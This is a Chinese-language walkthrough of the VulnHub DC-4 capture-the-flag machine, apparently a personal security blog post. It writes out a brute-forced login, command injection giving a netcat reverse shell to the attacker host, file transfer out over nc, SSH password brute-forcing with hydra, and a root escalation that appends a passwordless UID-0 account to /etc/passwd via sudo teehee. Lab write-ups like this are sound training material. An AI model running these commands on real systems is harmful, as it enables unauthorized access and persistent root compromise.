DC-4-teehee提權

NoCirc1e發表於2024-05-04

image.png

  • 主機資訊
  • 實驗過程

詳情介紹請參考下載地址
任務目標:拿下系統的root賬戶
靶機下載地址:https://www.vulnhub.com/entry/dc-4,313/

主機資訊

DC4:192.168.75.151
Kali:192.168.75.150

實驗過程

先發現內網存活主機
arp-scan --interface eth0 192.168.75.1/24
image.png
然後檢視靶機開放的埠
nmap -A -p- -T4 -v 192.168.75.151
image.png
訪問80,是一個登入頁面
image.png
既然遇到登入頁面,那就可以嘗試看看,是否有弱口令
透過Bp爆破

  • 使用者名稱:admin
  • 密碼:happy

登進後臺
image.png
毫無疑問,肯定點選“Command”,發現可以執行一些命令
image.png
透過Bp抓取資料包並修改命令,發現修改後的命令可以執行
image.png
這裡我直接反彈Shell
nc -e /bin/bash 192.168.75.150 8888
image.png
shell建立成功升級為互動式shell
python -c 'import pty;pty.spawn("/bin/bash")'
image.png
cd /home
發現三個賬號的家:charles、jim、sam
image.png
最終在jim的家中發現了一個老密碼的檔案
image.png
image.png
將這些密碼儲存下來並對jim進行ssh爆破,因為在資訊蒐集階段我們可以看到靶機是開放了22埠
這裡可以用nc進行檔案傳輸
# Kali
nc -nvlp 5555 > old-passwords.txt
# DC4
nc 192.168.75.150 5555 < /home/jim/backups/old-passwords.bak
image.png
image.png
現在用hydra對jim賬號進行SSH爆破
hydra -l jim -P /root/old-passwords.txt ssh://192.168.75.151
image.png
透過ssh連線到靶機,執行如下命令:
image.png
登入提示:You have mail.
image.png
找到了一封root寫給jim的郵件
image.png
去/var/mail再看看有沒有其他有意思的資訊,找到了一封charles寫給jim的郵件,並且看到了charles的賬戶密碼
這封郵件來得非常妙,是charles寫給jim的。因為charles要出去度假了,所以老闆叫charles把自己的密碼^xHhA&hvim0y給jim。So直接用郵箱傳遞密碼是非常不安全的。
image.png
那麼我們切換到charles
image.png
首先發現jim不能使用sudo許可權,難怪靶機還給了我們charles的賬戶,發現charles可以使用/usr/bin/teehee,並且不需要使用root密碼
image.png
可以看到使用teehee提權,teehee就是tee的變體從標準輸入讀取並寫入標準輸出和檔案
我們可以藉助teehee往passwd寫入一個root賬號即可得到root許可權
檢視一下這個命令的幫助手冊,使用-a引數在/etc/passwd檔案裡面新建一個有管理員許可權的使用者
image.png
首先來了解一下/etc/passwd的格式

echo "NoCirc1e::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
image.png
切換使用者即可提權成功,並讀取flag
image.png

相關文章